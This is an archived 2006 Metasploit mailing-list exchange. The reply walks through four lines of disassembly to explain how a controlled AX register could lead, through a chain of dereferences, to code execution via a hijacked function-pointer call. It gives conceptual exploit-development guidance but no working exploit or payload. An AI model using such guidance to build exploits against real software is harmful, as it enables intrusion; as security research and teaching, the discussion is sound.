exploitable???

[sargoniv at gmail.com (John Sprocket)]

whenever you look at something like this to see if it's exploitable
you can usually
see a dependency chain. to summarize. yes, it's exploitable.
would it be a pain in the ass? yea, prolly.
so your goal is to execute co0e of your choice via a function pointer.

let's be backwardz:
1B0114A3   FF52 10          CALL DWORD PTR DS:[EDX+10]
1B0114A1   8B11             MOV EDX,DWORD PTR DS:[ECX]
1B01149A   8B8C87 B0000000  MOV ECX,DWORD PTR DS:[EDI+EAX*4+B0]
1B011497   0FBFC0           MOVSX EAX,AX

let's summarize whatcha got:
your goal == calling [edx+0x10].
edx depends on the value at [ecx]
ecx then depends on the value at [edi + eax*4 + 0xb0]
and you control some of eax.
our primary variable here is edi which probably gets allocated somewhere.

so at the poc [point-of-crash] your process, you're prolly gonna want
to know the state of your
regs, like mainly edi. see what address edi was allocated at. then add
0xb0 to it.
now at 0x1b0114a1, it gets dereferenced again. so, look around for a
location where eax
points to an address that points to code that you control. then
subtract 10 and you're good
to go.

after you got that down...then comes figuring out a way to make it
"reliable". that's the exciting^W"fun" part. :)

.sargoniv



skape's shit looks like it will rock btw.
http://metasploit.blogspot.com/2006/04/interprocedural-data-flow-dependencies.html#links




----pardon this archive paste---
Subject: [framework] exploitable???
From: <arahzone-msf[at]yahoo.com>
Date: Thu, 22 Jun 2006 14:24:14 -0700 (PDT)
Reply-to: framework[at]metasploit.com

________________________________
   Hi,

  I am controlling AX in the code below but I don't know how to exploit
it. Is this exploitable?

  1B011497   0FBFC0           MOVSX EAX,AX
1B01149A   8B8C87 B0000000  MOV ECX,DWORD PTR DS:[EDI+EAX*4+B0]
1B0114A1   8B11             MOV EDX,DWORD PTR DS:[ECX]
1B0114A3   FF52 10          CALL DWORD PTR DS:[EDX+10]

  Thanks in advance